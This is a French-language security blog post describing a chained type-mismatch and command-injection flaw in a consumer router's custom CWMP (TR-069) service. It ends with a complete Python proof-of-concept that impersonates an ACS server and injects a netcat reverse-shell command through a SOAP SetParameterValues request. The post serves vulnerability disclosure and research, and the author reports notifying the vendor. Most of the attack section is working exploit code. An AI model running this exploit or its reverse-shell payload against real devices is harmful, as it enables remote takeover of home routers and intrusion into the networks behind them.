<!doctype html>
<html lang="en">
  <head>
    <title>Abusing custom CWMP XML parsing to achieve RCE // Argiopa Labs</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.148.2">
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="Argiopa Labs" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="/css/main.min.032c0341fe2870debd65722570c0566263bc5d66a298f943e7d80ecb9531241f.css" />
    

    
    
  <meta name="twitter:card" content="summary">
  <meta name="twitter:title" content="Abusing custom CWMP XML parsing to achieve RCE">
  <meta name="twitter:description" content="Introduction Parallèlement à mon activité principale, j’ai récemment entrepris en side project de chercher des vulnérabilités sur une gamme de routeurs grand public. Il s’avère que lors du mapping de la surface d’attaque, j’ai découvert une implémentation customisée du protocole CWMP (CPE WAN Management Protocol). En effet, contrairement à une implementation standard de la stack TR-069, ces appareils avaient leur propre service CWMP dans /usr/bin/cwmp avec une shared library libcwmp.so .">

    <meta property="og:url" content="https://argiopa-labs.fr/posts/abusing_cwmp_xml_parsing/">
  <meta property="og:site_name" content="Argiopa Labs">
  <meta property="og:title" content="Abusing custom CWMP XML parsing to achieve RCE">
  <meta property="og:description" content="Introduction Parallèlement à mon activité principale, j’ai récemment entrepris en side project de chercher des vulnérabilités sur une gamme de routeurs grand public. Il s’avère que lors du mapping de la surface d’attaque, j’ai découvert une implémentation customisée du protocole CWMP (CPE WAN Management Protocol). En effet, contrairement à une implementation standard de la stack TR-069, ces appareils avaient leur propre service CWMP dans /usr/bin/cwmp avec une shared library libcwmp.so .">
  <meta property="og:locale" content="en">
  <meta property="og:type" content="article">
    <meta property="article:section" content="posts">
    <meta property="article:published_time" content="2025-07-27T18:51:55+02:00">
    <meta property="article:modified_time" content="2025-07-27T18:51:55+02:00">


  </head>
  <body>
    <header class="app-header">
      <a href="/"><img class="app-header-avatar" src="/argiopa_labs.png" alt="Argiopa Labs" /></a>
      <span class="app-header-title">Argiopa Labs</span>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/">Home</a>
             - 
          
          <a class="app-header-menu-item" href="/about/">About</a>
      </nav>
      <p>argiopa watches. argiopa finds.</p>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">Abusing custom CWMP XML parsing to achieve RCE</h1>
      <div class="post-meta">
        <div>
          <svg class="icon icon-calendar" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><title>calendar</title><rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line></svg>
          Jul 27, 2025
        </div>
        <div>
          <svg class="icon icon-clock" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><title>clock</title><circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline></svg>
          5 min read
        </div>
      </div>
    </header>
    <div class="post-content">
      <h2 id="introduction">Introduction</h2>
<p>Parallèlement à mon activité principale, j&rsquo;ai récemment entrepris en side project de chercher des vulnérabilités sur une gamme de routeurs grand public. Il s&rsquo;avère que lors du mapping de la surface d&rsquo;attaque, j&rsquo;ai découvert une implémentation customisée du protocole CWMP (CPE WAN Management Protocol). En effet, contrairement à une implementation standard de la stack TR-069, ces appareils avaient leur propre service CWMP dans /usr/bin/cwmp avec une shared library libcwmp.so .</p>
<p>Il est très fréquent que lors de l&rsquo;implementation d&rsquo;un tel protocole, des constructeurs peu consciencieux ne prêtent pas ou peu d&rsquo;attention à la securité de leurs produits. En remontant la piste de ce protocole, j&rsquo;ai découvert une <code>type mismatch</code> vulnerability dans la logique de parsing des requêtes. Cette vulnérabilité chainée à une injection de commmande nous permet d&rsquo;avoir une Remote Code Execution sur l&rsquo;appareil.</p>
<hr>
<h2 id="attack-surface-mapping">Attack Surface Mapping</h2>
<p>En dépit de failles plutôt aisées à trouver telles que des injections de commandes en lua (qui étaient toutes patchées avec des formatter comme <code>%q</code>), l&rsquo;implémentation custom de cwmp représentait une cible bien plus intéressante aussi bien d&rsquo;un point de vue technique que d&rsquo;un point de vue de vecteur d&rsquo;attaque.</p>
<ul>
<li><code>/usr/bin/cwmp</code> – le binaire (strippé) implémentant CWMP</li>
<li><code>libcwmp.so</code> –  une librairie chargée au runtime et qui reçoit les paramètres des requêtes parsées.</li>
</ul>
<p>En utilisant des cross-références, j&rsquo;ai en effet remarqué que le binaire utilise <code>dlsym</code> pour appeler une fonction avec les paramètres extraits de la requête.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">int</span> <span style="color:#66d9ef">__fastcall</span> <span style="color:#a6e22e">api_libcwmp</span>(<span style="color:#66d9ef">const</span> <span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>func_name) {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>handle)
</span></span><span style="display:flex;"><span>        handle <span style="color:#f92672">=</span> <span style="color:#a6e22e">dlopen</span>(<span style="color:#e6db74">&#34;/usr/lib/libcwmp.so&#34;</span>, <span style="color:#ae81ff">1</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>handle) <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">int</span> (<span style="color:#f92672">*</span>func)(<span style="color:#66d9ef">int</span>, <span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>) <span style="color:#f92672">=</span> <span style="color:#a6e22e">dlsym</span>(handle, func_name);
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">dlerror</span>()) <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">func</span>(v6, <span style="color:#f92672">&amp;</span>req);
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><hr>
<h2 id="vulnerability-1-type-mismatch-in-setparametervalues">Vulnerability 1: Type Mismatch in <code>SetParameterValues</code></h2>
<p>La méthode <code>SetParameterValues</code> parse notre requêtes XML, et extrait le nom du paramètre,  le type de la valeur ainsi que la valeur. Le binaire s&rsquo;assure ensuite que le type du paramètre correspond à celui de la fonction dans la librairie.</p>
<p>Cependant, la logique de cette vérification est lacunaire car la fonction ne compare que le type déclaré avec le type de la fonction et ne vérifie pas que le contenu correspond au type déclaré.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">if</span> (MethodType <span style="color:#f92672">!=</span> reqType <span style="color:#f92672">&amp;&amp;</span> (reqType <span style="color:#f92672">!=</span> <span style="color:#e6db74">&#34;u&#34;</span> <span style="color:#f92672">||</span> (MethodType <span style="color:#f92672">&amp;</span> <span style="color:#ae81ff">0xFFFFFFEF</span>) <span style="color:#f92672">!=</span> <span style="color:#e6db74">&#34;C&#34;</span>)) {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">log_error</span>(<span style="color:#e6db74">&#34;param %s type mismatch</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>, paramName);
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Cela permet par exemple <strong>à un attaquant de passer un string à une fonction qui attend un <code>unsignedInt</code> ou un autre type de valeur</strong>.</p>
<hr>
<h2 id="vulnerability-2-command-injection-in-qos-function">Vulnerability 2: Command Injection in QoS Function</h2>
<p>La fonction &ldquo;X_REDACTED_QoS_Upband&rdquo; qui attend un <code>unsignedInt</code> construit une commande avec la valeur donnée et cette commande est ensuite passée à la fonction <code>system</code></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#a6e22e">sprintf</span>(cmd, <span style="color:#e6db74">&#34;/usr/bin/tr069/cwmp-qos 1 %s 0&#34;</span>, req<span style="color:#f92672">-&gt;</span>buffer);
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">system</span>(cmd);
</span></span></code></pre></div><p>Bien qu&rsquo;il y ait un buffer overflow via l&rsquo;utilisation de <code>sprintf</code>, il n&rsquo;était pas possible d&rsquo;exploiter la vulnérabilité à cause du stack canary. Cependant, l&rsquo;injection de commande est quant à elle bien exploitable.</p>
<p>Comme le type du paramètre n&rsquo;etait pas strictement appliqué, il est possible d&rsquo;injecter une commande par l&rsquo;envoi d&rsquo;une requête qui spécifie un type <code>unsignedInt</code> mais qui contienne quand même autre chose que le type de valeur attendue.</p>
<hr>
<h2 id="exploitation-chain">Exploitation Chain</h2>
<p>L&rsquo;exploitation du routeur repose donc sur l&rsquo;enchainement de deux vulnérabilités:</p>
<ol>
<li><strong>Type Mismatch</strong> – Qui permet de passer outre la vérification du type de <code>SetParameterValues</code>.</li>
<li><strong>Command Injection</strong> – Injection d&rsquo;une commande arbitraire via la fonction QoS.</li>
</ol>
<p>En réimplémentant un client CWMP, on peut construire un payload SOAP qui déclare le paramètre comme <code>xsd:unsignedInt</code> mais qui contienne une commande.</p>
<h3 id="poc">POC</h3>
<p>Voila l&rsquo;exploitation complète de ces vulnérabilités:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> argparse
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> web_client <span style="color:#f92672">import</span> WebClient
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">transform_header</span>(header: dict) <span style="color:#f92672">-&gt;</span> str:
</span></span><span style="display:flex;"><span>    header_str <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> key, values <span style="color:#f92672">in</span> header<span style="color:#f92672">.</span>items():
</span></span><span style="display:flex;"><span>        header_str <span style="color:#f92672">+=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">{</span>key<span style="color:#e6db74">}</span><span style="color:#e6db74">: </span><span style="color:#e6db74">{</span>values<span style="color:#e6db74">}</span><span style="color:#ae81ff">\x0d\x0a</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> header_str
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">generate_body</span>(data: bytes):
</span></span><span style="display:flex;"><span>    placeholder <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;&#34;&lt;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &lt;soap-env:Envelope xmlns:soap-enc=&#34;http://schemas.xmlsoap.org/soap/encoding/&#34; xmlns:soap-env=&#34;http://schemas.xmlsoap.org/soap/envelope/&#34; xmlns:xsd=&#34;http://www.w3.org/2001/XMLSchema&#34; xmlns:xsi=&#34;http://www.w3.org/2001/XMLSchema-instance&#34; xmlns:cwmp=&#34;urn:dslforum-org:cwmp-1-0&#34;&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &lt;soap-env:Header&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &lt;cwmp:ID soap-env:mustUnderstand=&#34;1&#34;&gt;a&lt;/cwmp:ID&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &lt;/soap-env:Header&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &lt;soap-env:Body&gt;%b
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &lt;/soap-env:Body&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &lt;/soap-env:Envelope&gt;&#34;&#34;&#34;</span> <span style="color:#f92672">%</span> (
</span></span><span style="display:flex;"><span>        data
</span></span><span style="display:flex;"><span>    )
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> placeholder
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">send_http_response</span>(code: int, header: dict, body: bytes, p):
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    headers <span style="color:#f92672">=</span> transform_header(header)
</span></span><span style="display:flex;"><span>    payload <span style="color:#f92672">=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;HTTP/1.1 </span><span style="color:#e6db74">{</span>code<span style="color:#e6db74">}</span><span style="color:#e6db74"> OK&#34;</span><span style="color:#f92672">.</span>encode()
</span></span><span style="display:flex;"><span>    payload <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x0d\x0a</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    payload <span style="color:#f92672">+=</span> headers<span style="color:#f92672">.</span>encode()
</span></span><span style="display:flex;"><span>    payload <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x0d\x0a</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    payload <span style="color:#f92672">+=</span> body
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> payload
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">generate_header</span>(data):
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> {
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;Content-Length&#34;</span>: len(data),
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;Server&#34;</span>: <span style="color:#e6db74">&#34;YouAlreadyKnowWhoItIs&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;SOAPServer&#34;</span>: <span style="color:#e6db74">&#34;YouAlreadyKnowWhoItIs&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;Content-Type&#34;</span>: <span style="color:#e6db74">&#39;text/xml; charset=&#34;utf-8&#34;&#39;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;Set-Cookie&#34;</span>: <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;session=secret</span><span style="color:#ae81ff">\x00</span><span style="color:#e6db74">cookie&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;Date&#34;</span>: <span style="color:#e6db74">&#34;Mon, 13 Mar 2007 13:33:37 GMT&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;Connection&#34;</span>: <span style="color:#e6db74">&#34;keep-alive&#34;</span>,
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">informresponse</span>(p):
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    informResponse <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;&#34;&lt;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&lt;soap-env:Envelope xmlns:soap-enc=&#34;http://schemas.xmlsoap.org/soap/encoding/&#34; xmlns:soap-env=&#34;http://schemas.xmlsoap.org/soap/envelope/&#34; xmlns:xsd=&#34;http://www.w3.org/2001/XMLSchema&#34; xmlns:xsi=&#34;http://www.w3.org/2001/XMLSchema-instance&#34; xmlns:cwmp=&#34;urn:dslforum-org:cwmp-1-0&#34;&gt;&lt;soap-env:Header&gt;&lt;cwmp:ID soap-env:mustUnderstand=&#34;1&#34;&gt;1003&lt;/cwmp:ID&gt;&lt;/soap-env:Header&gt;&lt;soap-env:Body&gt;&lt;cwmp:InformResponse&gt;&lt;MaxEnvelopes&gt;1&lt;/MaxEnvelopes&gt;&lt;/cwmp:InformResponse&gt;&lt;/soap-env:Body&gt;&lt;/soap-env:Envelope&gt;&#34;&#34;&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    headers <span style="color:#f92672">=</span> generate_header(informResponse)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    p<span style="color:#f92672">.</span>send(send_http_response(<span style="color:#ae81ff">200</span>, headers, informResponse, p))
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">set_config_value</span>(name: str, data_type: str, value: bytes, p):
</span></span><span style="display:flex;"><span>    data <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;&#34;&lt;cwmp:SetParameterValues&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &lt;ParameterList soap-enc:arrayType=&#34;cwmp:ParameterValueStruct[1]&#34;&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            &lt;ParameterValueStruct&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                &lt;Name&gt;%b&lt;/Name&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                &lt;Value xsi:type=&#34;xsd:%b&#34;&gt;%b&lt;/Value&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            &lt;/ParameterValueStruct&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &lt;/ParameterList&gt;&lt;ParameterKey&gt;&lt;/ParameterKey&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &lt;/cwmp:SetParameterValues&gt;&#34;&#34;&#34;</span> <span style="color:#f92672">%</span> (
</span></span><span style="display:flex;"><span>        name<span style="color:#f92672">.</span>encode(),
</span></span><span style="display:flex;"><span>        data_type<span style="color:#f92672">.</span>encode(),
</span></span><span style="display:flex;"><span>        value,
</span></span><span style="display:flex;"><span>    )
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    log<span style="color:#f92672">.</span>info(<span style="color:#e6db74">&#34;Sent data: &#34;</span> <span style="color:#f92672">+</span> data<span style="color:#f92672">.</span>decode())
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    body <span style="color:#f92672">=</span> generate_body(data)
</span></span><span style="display:flex;"><span>    headers <span style="color:#f92672">=</span> generate_header(body)
</span></span><span style="display:flex;"><span>    p<span style="color:#f92672">.</span>send(send_http_response(<span style="color:#ae81ff">200</span>, headers, body, p))
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">get_parameter_name</span>(name, p):
</span></span><span style="display:flex;"><span>    data <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;&#34;&lt;cwmp:GetParameterNames&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &lt;ParameterPath&gt;%b&lt;/ParameterPath&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &lt;NextLevel&gt;0&lt;/NextLevel&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &lt;/cwmp:GetParameterNames&gt;&#34;&#34;&#34;</span> <span style="color:#f92672">%</span> (
</span></span><span style="display:flex;"><span>        name
</span></span><span style="display:flex;"><span>    )
</span></span><span style="display:flex;"><span>    body <span style="color:#f92672">=</span> generate_body(data)
</span></span><span style="display:flex;"><span>    headers <span style="color:#f92672">=</span> generate_header(body)
</span></span><span style="display:flex;"><span>    p<span style="color:#f92672">.</span>send(send_http_response(<span style="color:#ae81ff">200</span>, headers, body, p))
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">get_configvalue</span>(name, p):
</span></span><span style="display:flex;"><span>    data <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;&#34;&lt;cwmp:GetParameterValues&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &lt;ParameterNames SOAP-ENC:arrayType=&#34;xsd:string[1]&#34; xmlns:SOAP-ENC=&#34;http://schemas.xmlsoap.org/soap/encoding/&#34;&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            &lt;string&gt;%b&lt;/string&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &lt;/ParameterNames&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        &lt;/cwmp:GetParameterValues&gt;&#34;&#34;&#34;</span> <span style="color:#f92672">%</span> (
</span></span><span style="display:flex;"><span>        name
</span></span><span style="display:flex;"><span>    )
</span></span><span style="display:flex;"><span>    body <span style="color:#f92672">=</span> generate_body(data)
</span></span><span style="display:flex;"><span>    headers <span style="color:#f92672">=</span> generate_header(body)
</span></span><span style="display:flex;"><span>    p<span style="color:#f92672">.</span>send(send_http_response(<span style="color:#ae81ff">200</span>, headers, body, p))
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">add_object</span>(object_name, paramKey, p):
</span></span><span style="display:flex;"><span>    data <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;&#34;&lt;cwmp:AddObject&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &lt;ObjectName&gt;InternetGatewayDevice.%b&lt;/ObjectName&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      &lt;ParameterKey&gt;%b&lt;/ParameterKey&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    &lt;/cwmp:AddObject&gt;&#34;&#34;&#34;</span> <span style="color:#f92672">%</span> (
</span></span><span style="display:flex;"><span>        object_name,
</span></span><span style="display:flex;"><span>        paramKey,
</span></span><span style="display:flex;"><span>    )
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    body <span style="color:#f92672">=</span> generate_body(data)
</span></span><span style="display:flex;"><span>    headers <span style="color:#f92672">=</span> generate_header(body)
</span></span><span style="display:flex;"><span>    p<span style="color:#f92672">.</span>send(send_http_response(<span style="color:#ae81ff">200</span>, headers, body, p))
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">close_conn</span>(p):
</span></span><span style="display:flex;"><span>    headers <span style="color:#f92672">=</span> generate_header()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    headers<span style="color:#f92672">.</span>update({<span style="color:#e6db74">&#34;Connection&#34;</span>: <span style="color:#e6db74">&#34;close&#34;</span>})
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    p<span style="color:#f92672">.</span>send(send_http_response(<span style="color:#ae81ff">200</span>, headers, <span style="color:#e6db74">&#34;&#34;</span>, p))
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">trigger_rce1</span>(ip: str, port: int, p):
</span></span><span style="display:flex;"><span>    set_config_value(
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;InternetGatewayDevice.X_REDACTED_QoS.Upband&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;unsignedInt&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|ash -i 2&gt;&amp;1|nc %b </span><span style="color:#e6db74">%i</span><span style="color:#e6db74"> &gt;/tmp/f &amp;`&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">%</span> (ip<span style="color:#f92672">.</span>encode(), port),
</span></span><span style="display:flex;"><span>        p,
</span></span><span style="display:flex;"><span>    )
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>cli <span style="color:#f92672">=</span> WebClient(<span style="color:#e6db74">&#34;192.168.10.1&#34;</span>)
</span></span><span style="display:flex;"><span>cli<span style="color:#f92672">.</span>login(<span style="color:#e6db74">&#34;password&#34;</span>)
</span></span><span style="display:flex;"><span>cli<span style="color:#f92672">.</span>set_cwmp_param(<span style="color:#e6db74">&#34;192.168.10.X:3333&#34;</span>, <span style="color:#e6db74">&#34;&#34;</span>, <span style="color:#e6db74">&#34;&#34;</span>, <span style="color:#ae81ff">3333</span>)
</span></span><span style="display:flex;"><span>cli<span style="color:#f92672">.</span>restart_cwmp()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>listener <span style="color:#f92672">=</span> listen(<span style="color:#ae81ff">3333</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>p <span style="color:#f92672">=</span> listener<span style="color:#f92672">.</span>wait_for_connection()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>p<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&lt;/SOAP-ENV:Envelope&gt;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>informresponse(p)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>p<span style="color:#f92672">.</span>clean()
</span></span><span style="display:flex;"><span>trigger_rce1(<span style="color:#e6db74">&#34;192.168.10.X&#34;</span>, <span style="color:#ae81ff">1338</span>, p)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>p<span style="color:#f92672">.</span>interactive()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>close_conn(p)
</span></span></code></pre></div><hr>
<h2 id="conclusion">Conclusion</h2>
<p>J&rsquo;ai donc pu chainer une &rsquo;type mismatch&rsquo; vulnerability avec une injection de commande pour réaliser une RCE sur une gamme entière de routeurs. J&rsquo;ai bien sûr rapporté la faille au constructeur.</p>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
